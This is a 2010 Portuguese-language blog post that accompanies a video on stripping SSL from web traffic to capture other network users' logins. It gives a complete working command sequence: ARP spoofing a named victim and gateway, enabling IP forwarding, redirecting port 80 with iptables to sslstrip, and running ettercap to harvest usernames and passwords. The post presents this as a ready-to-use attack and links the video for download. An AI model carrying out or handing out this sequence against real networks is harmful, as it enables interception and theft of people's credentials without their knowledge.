Sniffer SSL - https

Posted: 13 maio 2010 by Bhior in Marcadores: ,
0

Nesta video vou mostrar como a criptografia SSL não e seguro. Foi feita um Homem-no-meio (Man In The Middle), redirecionei todo trafico da rede (porta 80), para uma outra porta onde meu micro escutava. O sniffer de SSL (sslstrip), fica escutando na porta e remove o SSL para que não possa voltar para o usuário. O ettercap que executei em "modo texto" só captura o Usuário(username ) e Senha(password).

Programas usados:

Programas usados:
SSLstrip
ARPspoof
Ettercap
Comando usados:

Citação:
kate /etc/etter.conf
* Descemente a opção do iptables, tirando o "#"
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.1.1.6 10.1.1.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ettercap -T -q -i wlan0

sslstrip -a -k -f
ettercap -T -q -i eth0
OBS: Se sua internet for wireless no lugar de "eth0" coloca-se "wlan0", o "0" vai depende de qual placa de rede você vai ultilizar.

Todas os programas são encontrados no backtrack 4


Baixar: http://www.4shared.com/file/9Np1dj7m/Sniffer_SSL.html

Assista on-line: http://bhior.blip.tv/file/3525086


0 comentários: